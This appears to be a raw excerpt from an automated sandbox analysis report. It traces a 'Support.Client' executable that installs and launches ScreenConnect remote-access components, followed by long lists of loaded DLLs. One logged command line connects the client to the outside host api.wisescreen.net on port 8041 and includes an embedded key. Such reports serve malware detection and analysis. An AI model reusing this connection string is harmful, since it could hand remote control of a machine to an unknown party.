                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System"
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
